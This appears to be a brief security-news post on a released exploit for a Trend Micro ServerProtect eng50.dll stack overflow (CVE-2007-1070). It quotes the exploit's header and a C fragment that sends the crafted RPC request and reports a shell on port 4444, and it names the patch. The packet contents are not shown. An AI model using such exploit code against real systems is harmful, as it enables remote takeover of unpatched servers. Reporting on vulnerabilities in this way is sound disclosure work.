Trend Micro ServerProtect eng50.dll Stack Overflow Exploit

An exploit targeting the ServerProtect vulnerability has been released. It reportedly opens a shell on port 4444.

/* 
 * Copyright (c) 2007 devcode
 *
 *
 *			^^ D E V C O D E ^^
 *
 * Trend Micro ServerProtect eng50.dll Stack Overflow
 * [CVE-2007-1070]
 *
 *
 * Description:
 *    A boundary error within a function in eng50.dll can be
 *    exploited to cause a stack-based buffer overflow via a
 *    specially crafted RPC request to the SpntSvc.exe service.
 *
 * Hotfix/Patch:
 *    http://www.trendmicro.com/download/product.asp?productid=17
 *
 * Vulnerable systems:
 *    ServerProtect for Windows 5.58
 *    ServerProtect for EMC 5.58
 *    ServerProtect for Network Appliance Filer 5.61
 *    ServerProtect for Network Appliance Filer 5.62
 *
 * Tested on:
 * 	  Microsoft Windows 2000 SP4
 * 
 *    This is a PoC and was created for educational purposes only. The
 *    author is not held responsible if this PoC does not work or is 
 *    used for any other purposes than the one stated above.
 *
 * Notes:
 *	  <3 TippingPoint for technical details. Had this made few days after
 *    disclosure (few months back), was rlsd on r1918 about a week ago 
 *    and I notice trend micro exploit reports on isc.sans.org. DIDNT KNOW
 *    I WAS THIS HOT DAYUM
 *
 *
 */

This is the part where it sends the request.

	printf("[+] Sending DCE Request packet...\n");
	nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 );
	if ( nRet == SOCKET_ERROR ) {
		printf("[-] Cannot send\n");
		closesocket( sConnect );
		return -1;
	}
 
	printf("[+] Check shell on port 4444 :)\n");	
	nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );	
	closesocket( sConnect );
	return 0;

This appears to be addressed by spnt_558_win_en_securitypatch4.exe, the patch released on 2007/07/27.